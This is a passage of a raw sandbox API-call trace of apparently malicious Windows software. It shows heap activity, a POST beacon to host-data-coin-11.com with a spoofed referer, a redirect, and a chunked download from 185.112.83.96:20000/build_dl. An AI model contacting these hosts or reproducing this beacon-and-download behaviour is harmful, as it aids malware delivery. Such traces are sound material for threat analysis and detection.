(HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211bb0) returned 0x68 [0162.440] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211bb0) returned 1 [0162.440] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211b90) returned 0x12 [0162.440] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211b90) returned 1 [0162.440] WinHttpCloseHandle (hInternet=0x84af570) returned 1 [0162.440] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211a70) returned 0x10c [0162.441] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211a70) returned 1 [0162.441] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211870) returned 0xc9 [0162.441] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211870) returned 1 [0162.442] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211950) returned 0x118 [0162.442] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211950) returned 1 [0162.442] lstrlenA (lpString="ä\x071|:|plugin_size=0") returned 19 [0162.442] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x15) returned 0x9211870 [0162.442] lstrlenA (lpString="1|:|plugin_size=0") returned 17 [0162.442] lstrlenA (lpString="plugin_size") returned 11 [0162.442] atoi (_Str="0") returned 0 [0162.442] lstrlenA (lpString="1|:|plugin_size=0") returned 17 [0162.442] lstrlenA (lpString="|:|") returned 3 [0162.442] MapViewOfFile (hFileMappingObject=0x223c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8ed0000 [0162.510] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0162.510] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x8ed0000) returned 0x0 [0162.549] atoi (_Str="1") returned 1 [0162.549] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x36fa4613 [0162.549] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x3f) returned 0x9211890 [0162.549] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe2772f6a [0162.549] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xad68b29c [0162.550] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x10e12021 [0162.550] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd8886927 [0162.550] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc80541ee [0162.550] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5a8fb955 [0162.550] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb620f9da [0162.550] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf57a4333 [0162.550] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x12f379b8 [0162.550] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb5cc2a9d [0162.550] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf0237ac6 [0162.550] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x600dcd6d [0162.550] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe065075c [0162.550] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x37d59dc1 [0162.550] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb8790c54 [0162.550] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xaf58cf1e [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x17275cab [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb41e12b [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x766aa712 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x371033bb [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x24b61d33 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x463a3416 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6e609f52 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb7b26297 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc164e934 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1b0b758c [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xedcb8a7b [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa9a42a06 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xadbb34c4 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8a1f8ebf [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa9a72bf2 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x22e630b8 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x16cf27a7 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2c281ef1 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x27ed3960 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa1bbee8a [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7fc77023 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x49b8f466 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6c9f19ec [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7c475b0d [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3f937c2 [0162.551] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcba85813 [0162.552] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3656e934 [0162.552] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6f31a041 [0162.552] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x92dff9d0 [0162.552] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9830dc1a [0162.552] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x98574956 [0162.552] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcebc7c38 [0162.552] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7da76ad0 [0162.552] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x840f4ac9 [0162.552] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2d7cc9ee [0162.552] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x86de3069 [0162.552] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x42eb8b2a [0162.552] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x20bb821b [0162.552] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x8e) returned 0x92118e0 [0162.552] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0162.552] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0162.552] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0162.553] lstrcatA (in: lpString1="", lpString2="QwT^[VE&Yz+`C`Y5:\\C*j7KXe+,'e('mlX9%833zE.5:m;e%EnG\\A^" | out: lpString1="QwT^[VE&Yz+`C`Y5:\\C*j7KXe+,'e('mlX9%833zE.5:m;e%EnG\\A^") returned="QwT^[VE&Yz+`C`Y5:\\C*j7KXe+,'e('mlX9%833zE.5:m;e%EnG\\A^" [0162.553] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10c) returned 0x9211980 [0162.553] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0162.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9211840, cbMultiByte=30, lpWideCharStr=0x9211980, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0162.553] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xfc4fc18 | out: pProxyConfig=0xfc4fc18) returned 1 [0162.563] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x83423f0 [0162.564] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0xfc4fcd0 | out: lpUrlComponents=0xfc4fcd0) returned 1 [0162.564] WinHttpConnect (hSession=0x83423f0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x84fc040 [0162.564] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x12) returned 0x9211aa0 [0162.564] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x68) returned 0x9211ac0 [0162.564] WinHttpOpenRequest (hConnect=0x84fc040, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x4a18280 [0162.564] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x4e) returned 0x9211b30 [0162.564] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10d) returned 0x9211b90 [0162.564] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xad398153 [0162.564] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x12) returned 0x9211cb0 [0162.564] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x17) returned 0x9211cd0 [0162.564] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfcae7b72 [0162.564] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfc84fbc9 [0162.564] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xaa45eab2 [0162.564] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7c3f8782 [0162.564] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x98f0a1f1 [0162.564] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x32f57d7e [0162.564] wsprintfW (in: param_1=0x9211b90, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://qlrev.org/") returned 39 [0162.564] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211cd0) returned 0x17 [0162.565] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211cd0) returned 1 [0162.565] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211cb0) returned 0x12 [0162.565] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211cb0) returned 1 [0162.565] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211b30) returned 0x4e [0162.566] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211b30) returned 1 [0162.566] WinHttpAddRequestHeaders (hRequest=0x4a18280, pwszHeaders="Accept: */*\r\nReferer: http://qlrev.org/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0162.566] WinHttpSendRequest (hRequest=0x4a18280, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x92118e0*, dwOptionalLength=0x85, dwTotalLength=0x85, dwContext=0x0) returned 1 [0163.385] WinHttpReceiveResponse (hRequest=0x4a18280, lpReserved=0x0) returned 1 [0163.386] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x2800) returned 0x9211cb0 [0163.386] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x9211cb0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fd88 | out: lpBuffer=0x9211cb0*, lpdwNumberOfBytesRead=0xfc4fd88*=0x2f) returned 1 [0163.386] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x9211cb0, Size=0x5000) returned 0x9211cb0 [0163.386] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x9211cdf, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fd88 | out: lpBuffer=0x9211cdf*, lpdwNumberOfBytesRead=0xfc4fd88*=0x0) returned 1 [0163.387] VirtualAlloc (lpAddress=0x0, dwSize=0x2f, flAllocationType=0x3000, flProtect=0x4) returned 0x460000 [0163.389] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211cb0) returned 1 [0163.389] WinHttpCloseHandle (hInternet=0x4a18280) returned 1 [0163.390] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211b90) returned 0x10d [0163.390] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211b90) returned 1 [0163.390] WinHttpCloseHandle (hInternet=0x84fc040) returned 1 [0163.390] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211ac0) returned 0x68 [0163.390] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211ac0) returned 1 [0163.390] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211aa0) returned 0x12 [0163.391] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211aa0) returned 1 [0163.391] WinHttpCloseHandle (hInternet=0x83423f0) returned 1 [0163.391] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211980) returned 0x10c [0163.391] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211980) returned 1 [0163.391] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211890) returned 0x3f [0163.391] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211890) returned 1 [0163.391] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x92118e0) returned 0x8e [0163.392] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x92118e0) returned 1 [0163.392] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x1008) returned 0x9211890 [0163.392] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x1008) returned 0x92128a0 [0163.392] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x13) returned 0x92138b0 [0163.392] lstrlenA (lpString="Location: http://185.112.83.96:20000/build_dl") returned 45 [0163.392] lstrlenA (lpString="Location:") returned 9 [0163.392] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x39) returned 0x92138d0 [0163.392] wsprintfA (in: param_1=0x92138d0, param_2="%s" | out: param_1="http://185.112.83.96:20000/build_dl") returned 35 [0163.392] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10c) returned 0x9213920 [0163.392] lstrlenA (lpString="http://185.112.83.96:20000/build_dl") returned 35 [0163.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x92138d0, cbMultiByte=36, lpWideCharStr=0x9213920, cchWideChar=72 | out: lpWideCharStr="http://185.112.83.96:20000/build_dl") returned 36 [0163.392] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xfc4fb48 | out: pProxyConfig=0xfc4fb48) returned 1 [0163.399] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x833fdb0 [0163.399] WinHttpCrackUrl (in: pwszUrl="http://185.112.83.96:20000/build_dl", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0xfc4fc00 | out: lpUrlComponents=0xfc4fc00) returned 1 [0163.399] WinHttpConnect (hSession=0x833fdb0, pswzServerName="185.112.83.96", nServerPort=0x4e20, dwReserved=0x0) returned 0x84fc360 [0163.400] WinHttpOpenRequest (hConnect=0x84fc360, pwszVerb=0x0, pwszObjectName="/build_dl", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x4a18280 [0163.400] WinHttpSendRequest (hRequest=0x4a18280, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0163.500] WinHttpReceiveResponse (hRequest=0x4a18280, lpReserved=0x0) returned 1 [0163.501] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x2800) returned 0x9213a40 [0163.501] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x9213a40, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x9213a40*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.511] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x9213a40, Size=0x5000) returned 0x9213a40 [0163.511] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x9216240, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x9216240*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.551] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x9213a40, Size=0x7800) returned 0x9213a40 [0163.551] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x9218a40, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x9218a40*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.552] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x9213a40, Size=0xa000) returned 0x8ed0080 [0163.556] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8ed7880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8ed7880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.596] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0xc800) returned 0x8eda090 [0163.599] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8ee4090, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8ee4090*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.600] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8eda090, Size=0xf000) returned 0x8ee68a0 [0163.603] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8ef30a0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8ef30a0*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.604] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ee68a0, Size=0x11800) returned 0x8ee68a0 [0163.604] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8ef58a0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8ef58a0*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.648] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ee68a0, Size=0x14000) returned 0x8ed0080 [0163.648] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8ee1880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8ee1880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.649] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x16800) returned 0x8ed0080 [0163.649] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8ee4080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8ee4080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.651] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x19000) returned 0x8ed0080 [0163.651] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8ee6880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8ee6880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.697] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x1b800) returned 0x8ed0080 [0163.697] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8ee9080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8ee9080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.698] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x1e000) returned 0x8ed0080 [0163.698] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8eeb880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8eeb880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.699] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x20800) returned 0x8ed0080 [0163.699] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8eee080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8eee080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.778] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x23000) returned 0x8ed0080 [0163.778] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8ef0880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8ef0880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.778] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x25800) returned 0x8ed0080 [0163.778] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8ef3080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8ef3080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.779] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x28000) returned 0x8ed0080 [0163.779] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8ef5880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8ef5880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.811] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x2a800) returned 0x8ef8090 [0163.817] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f20090, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f20090*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.818] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ef8090, Size=0x2d000) returned 0x8f228a0 [0163.822] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f4d0a0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f4d0a0*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.823] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8f228a0, Size=0x2f800) returned 0x8ed0080 [0163.823] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8efd080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8efd080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.866] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x32000) returned 0x8ed0080 [0163.867] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8eff880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8eff880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.867] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x34800) returned 0x8ed0080 [0163.867] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f02080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f02080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.869] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x37000) returned 0x8ed0080 [0163.869] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f04880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f04880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.874] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x39800) returned 0x8ed0080 [0163.874] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f07080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f07080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.971] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x3c000) returned 0x8ed0080 [0163.971] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f09880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f09880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.971] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x3e800) returned 0x8ed0080 [0163.971] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f0c080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f0c080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.972] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x41000) returned 0x8ed0080 [0163.972] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f0e880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f0e880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0163.994] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x43800) returned 0x8ed0080 [0163.994] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f11080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f11080*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.168] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x46000) returned 0x8ed0080 [0164.168] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x8f13880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0x8f13880*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0164.171] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x8ed0080, Size=0x48800) returned 0x8ed0080 [0164.171] WinHttpReadData (in: hRequest=0x4a18280, 